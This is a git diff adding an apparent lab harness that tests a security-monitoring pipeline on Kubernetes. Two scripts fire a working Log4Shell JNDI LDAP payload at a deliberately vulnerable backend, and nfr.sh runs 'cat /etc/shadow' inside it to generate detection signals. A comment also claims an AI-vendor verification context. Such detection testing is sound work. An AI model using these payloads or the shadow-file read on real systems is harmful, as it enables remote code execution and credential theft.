+# Either way the function dies unless $CH_HTTP/ping answers.
+ch_portforward_up(){
+ if [[ "${CH_NO_PF:-0}" == "1" ]]; then
+ # Auto-fill CH_HTTP from the in-cluster service if left at the default.
+ if [[ "$CH_HTTP" == "http://127.0.0.1:8123" ]]; then
+ local svc; svc="$(ch_svc)"; [[ -n "$svc" ]] || die "no ClickHouse svc exposing 8123 in ns $CH_NS"
+ CH_HTTP="http://${svc}.${CH_NS}.svc:8123"
+ fi
+ log "lab-side mode: CH_HTTP=$CH_HTTP (no port-forward)"
+ curl -fsS "$CH_HTTP/ping" >/dev/null 2>&1 || die "CH not reachable at $CH_HTTP"
+ return 0
+ fi
+ local svc; svc="$(ch_svc)"; [[ -n "$svc" ]] || die "no ClickHouse svc exposing 8123 in ns $CH_NS"
+ log "port-forward svc/$svc 8123 (ns $CH_NS)"
+ k -n "$CH_NS" port-forward "svc/$svc" 8123:8123 >/tmp/aeload-pf.log 2>&1 &
+ _PF_PID=$!
+ # Poll /ping for up to 30 x 0.5s while the forward comes up.
+ for _ in $(seq 1 30); do
+ curl -fsS "$CH_HTTP/ping" >/dev/null 2>&1 && { log "port-forward ready"; return 0; }
+ sleep 0.5
+ done
+ die "port-forward to CH did not become ready (see /tmp/aeload-pf.log)"
+}
+# ch_portforward_down — kill the background port-forward, if one was started.
+ch_portforward_down(){ [[ -n "$_PF_PID" ]] && kill "$_PF_PID" 2>/dev/null || true; }
+# Installed when this file is sourced: tears the forward down on shell exit.
+trap ch_portforward_down EXIT
+
+# chq <sql> — run a read query, return the raw result (default user / RO creds).
+# POSTs the SQL to $CH_HTTP/; basic-auth is added only when CH_RO_USER is set.
+# curl's stderr is discarded, so a failed request shows up as empty output.
+chq(){
+ local sql="$1" auth=()
+ [[ -n "$CH_RO_USER" ]] && auth=(-u "${CH_RO_USER}:${CH_RO_PASS}")
+ # ${auth[@]+...}: with `set -u`, bash older than 4.4 treats "${auth[@]}" on an EMPTY
+ # array as an unbound variable and aborts; this form expands to nothing instead.
+ curl -sS ${auth[@]+"${auth[@]}"} --data-binary "$sql" "$CH_HTTP/" 2>/dev/null
+}
+
+# count_pod <table> <uniq> — rows in forensic_db.<table> for this rep's pod
+# (globally-unique pod name → safe LIKE). Returns an integer (0 if table/rows absent).
+# The query output is reduced to its digits (at most 18), so error text never leaks out.
+count_pod(){
+ local table="$1" uniq="$2"
+ local n; n="$(chq "SELECT count() FROM forensic_db.${table} WHERE pod LIKE '%${uniq}%'" )"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 18
+}
+
+# NOTE: the live AE DaemonSet polls kubescape_logs WHERE hostname=<node>,
+# so every injected fixture's hostname MUST be a real node. Per-rep isolation is
+# therefore by UNIQUE POD (distinct anomaly_hash), not by hostname. The helpers
+# below scope to (hostname=node, pod LIKE the rep's unique pod). adaptive_
+# attribution stores the BARE pod name (kubescape podName), unlike the protocol
+# tables whose pod is "<namespace>/<pod>" (upid_to_pod_name).
+
+# attrib_count <node> <pod> — adaptive_attribution rows (FINAL) for a rep.
+# Output is reduced to digits (at most 18).
+attrib_count(){
+ local node="$1" pod="$2" n
+ n="$(chq "SELECT count() FROM (SELECT 1 FROM forensic_db.adaptive_attribution FINAL WHERE hostname='${node}' AND pod LIKE '%${pod}%')")"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 18
+}
+# uniq_hashes <node> <pod> — number of distinct anomaly_hash values in
+# adaptive_attribution (queried without FINAL) for a rep.
+uniq_hashes(){
+ local node="$1" pod="$2" n
+ n="$(chq "SELECT uniqExact(anomaly_hash) FROM forensic_db.adaptive_attribution WHERE hostname='${node}' AND pod LIKE '%${pod}%'")"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 18
+}
+# watermark_of <node> — current trigger watermark for that node (monotone across
+# reps that share a node; equals the most-recently-injected event_time).
+# Reads trigger_watermark FINAL for table_name='kubescape_logs'; output is reduced
+# to digits (at most 20).
+watermark_of(){
+ local node="$1" n
+ n="$(chq "SELECT watermark FROM forensic_db.trigger_watermark FINAL WHERE hostname='${node}' AND table_name='kubescape_logs'")"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 20
+}
+
+# attr_field <node> <pod> <field> — read one adaptive_attribution FINAL
+# column (e.g. n_anomalies, toUnixTimestamp(last_seen)) for a single pod.
+# <pod> is matched exactly (pod='...'), and only the digits of the result are kept,
+# so <field> must be a numeric expression.
+# NOTE(review): if more than one row matches, the digits of all rows are concatenated.
+attr_field(){
+ local node="$1" pod="$2" field="$3" n
+ n="$(chq "SELECT ${field} FROM forensic_db.adaptive_attribution FINAL WHERE hostname='${node}' AND pod='${pod}'")"
+ echo "${n:-0}" | tr -dc '0-9' | head -c 20
+}
+
+# first_node — first node name returned by the API (fixture hostname for control-plane
+# experiments). nodes_list — all node names, newline-separated.
+# NOTE(review): neither helper filters on schedulability — confirm the first node is usable.
+nodes_list(){ k get nodes -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}'; }
+first_node(){ nodes_list | head -n1; }
+
+# now_ns — wall-clock unix nanoseconds (unique-name suffix only).
+# NOTE(review): relies on `date` supporting %N (GNU date) — confirm on non-GNU hosts.
+now_ns(){ date +%s%N; }
+# now_s — wall-clock unix SECONDS = the production event_time unit (soc Vector
+# emits seconds; the CH DDL TTL/PARTITION assume seconds). ALL fixtures use this.
+now_s(){ date +%s; }
+
+# warmup <node> — absorb the AE trigger cold-start on a node. The very first
+# poll after AE boots only establishes the watermark baseline, so the first
+# real event for a fresh hostname can be missed; a throwaway injection +
+# settle primes the per-node trigger so measured reps are steady-state.
+# The injection is best-effort (failure ignored); settle time is WARMUP_SETTLE_S (default 6s).
+warmup(){
+ local node="$1" inject="$HERE/inject.sh"
+ log "warmup trigger on node=$node"
+ "$inject" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+ --hostname "$node" --ns aeload --pod "warmup-$(now_ns)" --rule R0001 \
+ --pid 999 --comm warmup --event-time "$(now_s)" >&2 || true
+ sleep "${WARMUP_SETTLE_S:-6}"
+}
+
+# wait_attrib [timeout_s] — poll adaptive_attribution
+# FINAL until it reaches (AE's 250ms poll + write can lag a few seconds;
+# a fixed sleep occasionally under-waited). Echoes the final observed count.
+wait_attrib(){
+ local node="$1" pod="$2" want="$3" to="${4:-20}" n=0
+ for _ in $(seq 1 "$to"); do
+ n="$(attrib_count "$node" "$pod")"
+ [[ "${n:-0}" -ge "$want" ]] && break
+ sleep 1
+ done
+ echo "${n:-0}"
+}
+
+# svc_ip <service> — ClusterIP of an aeload service (literal IP for the generator).
+svc_ip(){ k -n "$AELOAD_NS" get svc "$1" -o jsonpath='{.spec.clusterIP}'; }
+
+# apply_sinks — bring up the shared aeload ns + http-sink + pg-sink (idempotent).
+# Substitutes __IMAGE__ in 00-sinks.yaml with $AELOAD_IMAGE (dies if unset), applies it,
+# and waits up to 120s for each sink deployment to roll out.
+apply_sinks(){
+ [[ -n "${AELOAD_IMAGE:-}" ]] || die "AELOAD_IMAGE not set"
+ sed "s#__IMAGE__#${AELOAD_IMAGE}#g" "$K8S_DIR/00-sinks.yaml" | k apply -f -
+ k -n "$AELOAD_NS" rollout status deploy/http-sink --timeout=120s
+ k -n "$AELOAD_NS" rollout status deploy/pg-sink --timeout=120s
+}
+
+# fire_gen — create a gen pod, wait for it
+# to fire, echo its one-line JSON manifest. Leaves the pod RUNNING (held).
+fire_gen(){
+ local name="$1" hn="$2" dn="$3" pn="$4"
+ local hip pip
+ hip="$(svc_ip http-sink)"; pip="$(svc_ip pg-sink)"
+ [[ -n "$hip" && -n "$pip" ]] || die "could not resolve sink ClusterIPs"
+ # GEN_SETTLE_MS: pre-band warm-up so Pixie/Stirling attaches BEFORE the exact
+ # band (exact-count tests). GEN_SUSTAIN_SEC: continuous trickle AFTER the band
+ # (sustained "keep writing until t_end" RCA). Defaults suit exact-count runs.
+ sed -e "s#__NAME__#${name}#g" -e "s#__IMAGE__#${AELOAD_IMAGE}#g" \
+ -e "s#__HTTP_ADDR__#${hip}:8080#g" -e "s#__PG_ADDR__#${pip}:5432#g" \
+ -e "s#__HTTP_N__#${hn}#g" -e "s#__DNS_N__#${dn}#g" -e "s#__PGSQL_N__#${pn}#g" \
+ -e "s#__SETTLE_PRE_MS__#${GEN_SETTLE_MS:-30000}#g" -e "s#__SUSTAIN_SEC__#${GEN_SUSTAIN_SEC:-0}#g" \
+ "$K8S_DIR/gen-pod.tmpl.yaml" | k apply -f - >&2
+ # Wait for the FIRED sentinel + grab the manifest line (allow for the warm-up).
+ local mani=""
+ for _ in $(seq 1 90); do
+ if k -n "$AELOAD_NS" logs "$name" 2>/dev/null | grep -q AELOAD_FIRED; then
+ mani="$(k -n "$AELOAD_NS" logs "$name" 2>/dev/null | grep AELOAD_MANIFEST | tail -1 | sed 's/^AELOAD_MANIFEST //')"
+ break
+ fi
+ sleep 1
+ done
+ [[ -n "$mani" ]] || die "gen $name never fired (logs:)\n$(k -n "$AELOAD_NS" logs "$name" 2>/dev/null | tail -20)"
+ echo "$mani"
+}
+del_gen(){ k -n "$AELOAD_NS" delete pod "$1" --grace-period=2 --wait=false >/dev/null 2>&1 || true; }
+
+# jget — tiny JSON field reader (numbers/strings) via python3.
+jget(){ python3 -c 'import json,sys;print(json.load(sys.stdin)[sys.argv[1]])' "$2" <<<"$1"; }
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh b/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh
new file mode 100755
index 00000000000..7cd7ba7b619
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/log4shell_fire.sh
@@ -0,0 +1,83 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# log4shell_fire.sh — generate the bob log4j-chain log4shell DETECTION SIGNAL reliably,
+# with clean restart. (Anthropic Cyber Verification context: this is detection-signal
+# generation for validating the kubescape→DX→AE chain, not offensive use.)
+#
+# Addresses bob#140 (the log4shell signal is STATEFUL/unreliable on a re-fired/restarted
+# backend — JVM negative-DNS cache + first-eval timing). Reliability is achieved BY
+# CONSTRUCTION: each attempt uses a fresh-JVM backend + the WORKING resolvable FQDN, then
+# VERIFIES the actual LDAP egress (backend → attacker:1389 in forensic_db.conn_stats) and
+# RETRIES until confirmed — the "validity gate". It never assumes the signal was generated.
+#
+# Hard-won facts baked in (see memory log4j-network-detection-chain / bob#140):
+# - WORKING JNDI host = attacker.<ANS>.svc.cluster.local (RESOLVABLE Service FQDN).
+# A bare/partial name (e.g. attacker-ns.svc) NXDOMAINs → DNS event dropped → nothing fires.
+# - attacker (LDAP server) MUST be up BEFORE backend (#140 attacker-before-backend).
+# - delete the backend pod (not just rollout) → fresh JVM → clears the negative-DNS cache.
+#
+# Run NODE-SIDE on the rig (kubectl reaches the cluster directly). Idempotent.
+# Env knobs: NS, ANS, RESTART(=1), MAXTRIES(=5), FIRES(=15).
+set -uo pipefail
+# Knobs (environment-overridable): backend namespace, attacker namespace, JNDI host,
+# restart-before-first-try flag, retry budget, requests per try, ClickHouse pod.
+NS=${NS:-log4j-poc}
+ANS=${ANS:-attacker-ns}
+JNDI_HOST=${JNDI_HOST:-attacker.$ANS.svc.cluster.local}
+# Literal lookup string; the single quotes keep the shell from expanding ${jndi:...}.
+JNDI='${jndi:ldap://'"$JNDI_HOST"':1389/Payload}'
+RESTART=${RESTART:-1}
+MAXTRIES=${MAXTRIES:-5}
+FIRES=${FIRES:-15}
+CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0}
+# chq <sql> — run a query with clickhouse-client inside the ClickHouse pod; stderr is discarded.
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+# ldap_count — conn_stats rows with remote_port=1389 in the last 5 minutes (any source pod).
+ldap_count(){ chq "SELECT count() FROM forensic_db.conn_stats WHERE remote_port=1389 AND time_ > now()-INTERVAL 5 MINUTE"; }
+
+# 0. Attacker/LDAP server up FIRST (#140).
+kubectl -n "$ANS" rollout status deploy/attacker --timeout=60s >/dev/null 2>&1 \
+ || { echo "FATAL: attacker (LDAP :1389) not ready — bring it up before backend"; exit 1; }
+echo "attacker ready (LDAP :1389) — #140 attacker-before-backend satisfied; JNDI host=$JNDI_HOST"
+
+# Fire/verify loop: up to $MAXTRIES attempts. Exit 0 as soon as the :1389 row count
+# grows across an attempt; exit 2 when no attempt confirmed the egress.
+# NOTE(review): before/after are counts over a SLIDING 5-minute window, so rows ageing
+# out between the two samples can hide newly arrived ones — confirm this is acceptable.
+for try in $(seq 1 "$MAXTRIES"); do
+ if [ "$RESTART" = 1 ]; then
+ echo "[try $try] delete backend pod → fresh JVM (clears negative-DNS cache)"
+ kubectl -n "$NS" delete pod -l app=backend --wait=true >/dev/null 2>&1
+ kubectl -n "$NS" rollout status deploy/backend --timeout=120s >/dev/null 2>&1
+ sleep 12 # app listening + Pixie re-attach
+ fi
+ # Re-resolve the backend Service address on every try.
+ BIP=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null)
+ BPORT=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null)
+ before=$(ldap_count)
+ echo "[try $try] fire JNDI at backend $BIP:$BPORT (x$FIRES)"
+ # Send $FIRES requests, 0.5s apart, with the JNDI string as User-Agent.
+ for _ in $(seq 1 "$FIRES"); do
+ kubectl -n "$ANS" exec deploy/attacker -- curl -s -m5 -A "$JNDI" "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+ sleep 0.5
+ done
+ sleep 40 # settle: LDAP egress lands in conn_stats
+ after=$(ldap_count)
+ echo "[try $try] backend->:1389 LDAP egress (last5m): before=${before:-?} after=${after:-?}"
+ if [ "${after:-0}" -gt "${before:-0}" ]; then
+ echo "SIGNAL CONFIRMED — backend->:1389 LDAP egress generated on try $try (host=$JNDI_HOST)."
+ echo "Downstream now has signal: R0005 (DNS) + ldap-egress for DX log4shell-rce-exfil detection."
+ exit 0
+ fi
+ echo "[try $try] NOT fired (literal \${jndi} in backend log = log4j didn't expand) — retrying with fresh JVM"
+ # Every retry restarts the backend, even when the first try was run with RESTART=0.
+ RESTART=1
+done
+echo "FAILED to confirm LDAP egress after $MAXTRIES tries."
+echo "Check: backend app log shows 'ua=\${jndi:...}' LITERAL (not expanded) ⇒ log4j lookups not evaluating;"
+echo "verify backend is the *-vulnerable image + log4j evaluates message lookups (bob#140 validity gate)."
+exit 2
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh b/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh
new file mode 100755
index 00000000000..130ae8ec599
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh
@@ -0,0 +1,67 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# nfr.sh — AE non-functional benchmark: throughput, AE+dx mem under load, and
+# END-TO-END no-data-loss proof (broker read_count == AE wrote_count == ACTUAL CH rows).
+# Two phases: passthrough (firehose, throughput stress) then streaming (DX). Node-side on rig.
+set -uo pipefail
+NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0
+DUR=${DUR:-150}
+OUT=/tmp/nfr.txt; : > "$OUT"
+chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; }
+say(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$OUT"; }
+BIP=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.clusterIP}'); BPORT=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.ports[0].port}')
+fire(){ kubectl -n attacker-ns exec deploy/attacker -- curl -s -m4 -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true
+ local BP; BP=$(kubectl -n $NS get pods --no-headers 2>/dev/null|awk '/^backend/{print $1;exit}')
+ [ -n "$BP" ] && kubectl -n $NS exec "$BP" -- sh -c 'whoami; cat /etc/shadow 2>/dev/null|head -1; getent hosts attacker.attacker-ns.svc.cluster.local >/dev/null 2>&1' >/dev/null 2>&1 || true; }
+memsum(){ kubectl -n "$1" top pod -l "$2" --no-headers 2>/dev/null | awk '{gsub(/Mi/,"",$3); s+=$3} END{print s+0}'; }
+truncate_all(){ local t; for t in http_events dns_events conn_stats pgsql_events ae_reconcile adaptive_attribution kubescape_logs; do chq "TRUNCATE TABLE IF EXISTS forensic_db.\`$t\`" >/dev/null 2>&1; done; }
+setarm(){ kubectl -n pl set env ds/adaptive-export "$@" ADAPTIVE_RECONCILE=true >/dev/null 2>&1; kubectl -n pl rollout status ds/adaptive-export --timeout=150s >/dev/null 2>&1; }
+
+run_phase(){ local name=$1; shift
+ say "=== PHASE $name : $* ==="
+ setarm "$@"; truncate_all; say " truncated; $name load window ${DUR}s"
+ local t0 aemax=0 dxmax=0 pemmax=0 sm=0
+ t0=$(date +%s)
+ while [ $(( $(date +%s) - t0 )) -lt "$DUR" ]; do
+ fire
+ local ae dx pem; ae=$(memsum pl 'name=adaptive-export'); dx=$(memsum honey 'app=dx-daemon'); pem=$(memsum pl 'name=vizier-pem')
+ [ "${ae:-0}" -gt "$aemax" ] && aemax=$ae; [ "${dx:-0}" -gt "$dxmax" ] && dxmax=$dx; [ "${pem:-0}" -gt "$pemmax" ] && pemmax=$pem
+ sm=$((sm+1)); sleep 12
+ done
+ local el; el=$(( $(date +%s) - t0 )); say " window done ${el}s ($sm samples); flush 20s"; sleep 20
+ say " [MEM peak] AE(2pods)=${aemax}Mi dx-daemon=${dxmax}Mi PEM=${pemmax}Mi"
+ say " [NO-LOSS PROOF] broker_read == AE_wrote == CH_actual_rows:"
+ local t rd wr ch
+ for t in http_events dns_events conn_stats; do
+ rd=$(chq "SELECT sum(read_count) FROM forensic_db.ae_reconcile WHERE table_name='$t'"); rd=${rd:-0}
+ wr=$(chq "SELECT sum(wrote_count) FROM forensic_db.ae_reconcile WHERE table_name='$t'"); wr=${wr:-0}
+ ch=$(chq "SELECT count() FROM forensic_db.$t"); ch=${ch:-0}
+ say " $t: read=$rd wrote=$wr CH_rows=$ch $([ "$wr" = "$ch" ] && echo 'MATCH' || echo '*MISMATCH*')$([ "$rd" = "$wr" ] && echo '/read==wrote' || echo '/READ!=WROTE')"
+ done
+ say " [BYTES] per-table rows + compressed bytes (on-disk data volume):"
+ chq "SELECT ' '||table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active AND table IN ('http_events','dns_events','conn_stats') GROUP BY table ORDER BY table FORMAT TSV" | tee -a "$OUT"
+ local tot; tot=$(chq "SELECT count() FROM forensic_db.http_events"); tot=$((tot + $(chq "SELECT count() FROM forensic_db.dns_events") + $(chq "SELECT count() FROM forensic_db.conn_stats")))
+ say " [THROUGHPUT] $name CH rows=$tot over ${el}s = $(awk -v r=$tot -v e=$el 'BEGIN{printf "%.1f", r/e}') rows/s"
+ say " [steered] $(chq "SELECT arrayStringConcat(groupArray(pod),',') FROM (SELECT DISTINCT pod FROM forensic_db.adaptive_attribution WHERE t_end>now())")"
+}
+
+say "##### AE NFR BENCHMARK START #####"
+run_phase ALL-passthrough ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_PASSTHROUGH_WINDOW_SEC=60 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=60
+run_phase DX-streaming ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_STREAM_WINDOW_SEC=60 ADAPTIVE_STREAM_REFRESH_SEC=60
+say "##### NFR DONE #####"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/run.sh b/src/e2e_test/adaptive_export_loadtest/harness/run.sh
new file mode 100755
index 00000000000..f8403e4fdbb
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/run.sh
@@ -0,0 +1,57 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# run.sh — drive the full AE fixture-isolation suite on a live rig and produce
+# the reproducibility evidence (per-experiment CSV + stats verdicts).
+#
+# Prereqs:
+# KUBECONFIG = tailscale-direct kubeconfig (make kubeconfig PG=<name>)
+# AELOAD_IMAGE = ttl.sh/aeload-<tag>:24h (built on the PG dev-machine)
+# AE in single-shot load-test mode (this script runs ae_config.sh).
+#
+# Usage: KUBECONFIG=... AELOAD_IMAGE=... EVID=/path ./run.sh
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+
+[[ -n "${AELOAD_IMAGE:-}" ]] || die "AELOAD_IMAGE not set"
+EVID="${EVID:-/home/croedig/biz/PoC/log4j/evidence/datavolume/aeload_$(date -u +%Y%m%dT%H%M%SZ)}"
+mkdir -p "$EVID"
+REPS_CTRL="${REPS_CTRL:-100}"
+REPS_E5="${REPS_E5:-100}"
+REPS_E6="${REPS_E6:-10}"
+log "evidence dir: $EVID"
+
+# 1) AE into single-shot load-test mode (idempotent).
+bash "$HERE/ae_config.sh"
+
+# 2) Control-plane experiments (no Pixie/gen needed).
+for e in E1 E2 E3 E4; do
+ log "=== control $e (reps=$REPS_CTRL) ==="
+ EXP="$e" REPS="$REPS_CTRL" OUT="$EVID/${e}.csv" bash "$HERE/exp_control.sh"
+done
+log "=== control E6 idempotency (reps=$REPS_E6) ==="
+EXP=E6 REPS="$REPS_E6" OUT="$EVID/E6.csv" bash "$HERE/exp_control.sh"
+
+# 3) Data-plane experiment (real Pixie capture of the counted band).
+log "=== data-plane E5 (reps=$REPS_E5) ==="
+REPS="$REPS_E5" OUT="$EVID/E5.csv" bash "$HERE/exp_e5.sh"
+
+# 4) Aggregate verdicts.
+log "=== aggregate ==="
+python3 "$HERE/stats.py" "$EVID"/*.csv | tee "$EVID/VERDICT.txt"
+log "DONE -> $EVID"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/stats.py b/src/e2e_test/adaptive_export_loadtest/harness/stats.py
new file mode 100755
index 00000000000..a9b4a6fa59a
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/stats.py
@@ -0,0 +1,89 @@
+#!/usr/bin/env python3
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+"""stats.py — reduce an experiment CSV to a per-metric reproducibility report.
+
+Exact reproducibility ⇔ every measured (`*_act`) metric has a single distinct
+value across all PASS reps (std = 0 / CV = 0). Prints per-metric
+n/distinct/mean/std/CV%/min/max and an overall verdict. No fabrication: it only
+summarizes the rows the harness actually recorded.
+
+Usage: stats.py <csv> [<csv> ...]
+"""
+import csv
+import statistics as st
+import sys
+
+
+def num(x):
+ try:
+ return float(x)
+ except (TypeError, ValueError):
+ return None
+
+
+def report(path):
+ with open(path) as f:
+ rows = list(csv.DictReader(f))
+ if not rows:
+ print(f"== {path}: empty ==")
+ return
+ cols = list(rows[0].keys())
+ passcol = "pass" if "pass" in cols else None
+ npass = sum(1 for r in rows if passcol and str(r[passcol]).startswith("PASS"))
+ print(f"== {path} == reps={len(rows)} PASS={npass}/{len(rows)}")
+
+ # Reproducibility metrics = the COUNT columns AE wrote (must be constant
+ # across reps). wm_act is EXCLUDED: it equals each rep's distinct event_time
+ # by design (monotone), validated per-rep as wm_act==wm_exp via the pass flag
+ # — it is not expected to be constant across reps.
+ metrics = [c for c in cols if c.endswith("_act") and c != "wm_act"]
+ metrics = list(dict.fromkeys(metrics)) # dedupe, keep order
+ repro_ok = True
+ for c in metrics:
+ vals = [num(r[c]) for r in rows if (not passcol or str(r[passcol]).startswith("PASS"))]
+ vals = [v for v in vals if v is not None]
+ if not vals:
+ print(f" {c:16s} (no numeric PASS values)")
+ continue
+ distinct = sorted(set(vals))
+ mean = st.fmean(vals)
+ sd = st.pstdev(vals) if len(vals) > 1 else 0.0
+ cv = (sd / mean * 100) if mean else 0.0
+ flag = "EXACT" if len(distinct) == 1 else f"VARIES({len(distinct)})"
+ if len(distinct) != 1:
+ repro_ok = False
+ print(f" {c:16s} n={len(vals):4d} distinct={len(distinct):3d} "
+ f"mean={mean:.3f} std={sd:.3f} cv={cv:.4f}% "
+ f"min={min(vals):.0f} max={max(vals):.0f} {flag}")
+ verdict = ("EXACTLY REPRODUCIBLE (all metrics std=0)" if repro_ok
+ else "NOT exactly reproducible (see VARIES above)")
+ print(f" VERDICT: {verdict}")
+ print()
+
+
+def main():
+ if len(sys.argv) < 2:
+ print(__doc__)
+ sys.exit(2)
+ for p in sys.argv[1:]:
+ report(p)
+
+
+if __name__ == "__main__":
+ main()
diff --git a/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml b/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml
new file mode 100644
index 00000000000..7aca396ff60
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml
@@ -0,0 +1,82 @@
+---
+# Shared, long-lived data-plane sinks for the AE load-tests. These are the PEER
+# side of cleanloadgen's traffic; AE filters to the client (gen) pod so the
+# sinks' own rows are excluded — but they carry NO probes/sidecars regardless so
+# the namespace stays free of uncounted traffic.
+#
+# __IMAGE__ is substituted by the harness (ttl.sh/aeload-<tag>:24h, built on the
+# PG dev-machine). pg-sink uses the public postgres image.
+apiVersion: v1
+kind: Namespace
+metadata:
+ name: aeload
+ labels:
+ app.kubernetes.io/part-of: ae-loadtest
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: http-sink
+ namespace: aeload
+spec:
+ replicas: 1
+ selector:
+ matchLabels: {app: http-sink}
+ template:
+ metadata:
+ labels: {app: http-sink}
+ spec:
+ # No probes anywhere: probe traffic would be captured by Pixie.
+ containers:
+ - name: httpsink
+ image: __IMAGE__
+ command: ["/usr/local/bin/httpsink"]
+ env:
+ - {name: LISTEN_ADDR, value: ":8080"}
+ ports:
+ - containerPort: 8080
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: http-sink
+ namespace: aeload
+spec:
+ selector: {app: http-sink}
+ ports:
+ - port: 8080
+ targetPort: 8080
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: pg-sink
+ namespace: aeload
+spec:
+ replicas: 1
+ selector:
+ matchLabels: {app: pg-sink}
+ template:
+ metadata:
+ labels: {app: pg-sink}
+ spec:
+ containers:
+ - name: postgres
+ image: postgres:16-alpine
+ # trust auth keeps the gen simple; no probes.
+ env:
+ - {name: POSTGRES_PASSWORD, value: postgres}
+ - {name: POSTGRES_HOST_AUTH_METHOD, value: trust}
+ ports:
+ - containerPort: 5432
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: pg-sink
+ namespace: aeload
+spec:
+ selector: {app: pg-sink}
+ ports:
+ - port: 5432
+ targetPort: 5432
diff --git a/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml b/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml
new file mode 100644
index 00000000000..6c02ee557c1
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml
@@ -0,0 +1,38 @@
+---
+# Per-rep generator pod. The harness renders one of these per repetition with a
+# UNIQUE name (gen-<exp>-<rep>) — that uniqueness is the data-plane isolation:
+# AE's df.pod filter pulls only this rep's traffic even if windows overlap.
+#
+# Substituted by the harness: __NAME__, __IMAGE__, __HTTP_ADDR__ (sink ClusterIP
+# :8080 as a literal IP so it adds no DNS), __PG_ADDR__, __HTTP_N__, __DNS_N__,
+# __PGSQL_N__, __SETTLE_PRE_MS__, __SUSTAIN_SEC__. The pod FIRES once then HOLDS
+# (blocks until SIGTERM) so its upid stays resolvable while AE queries the
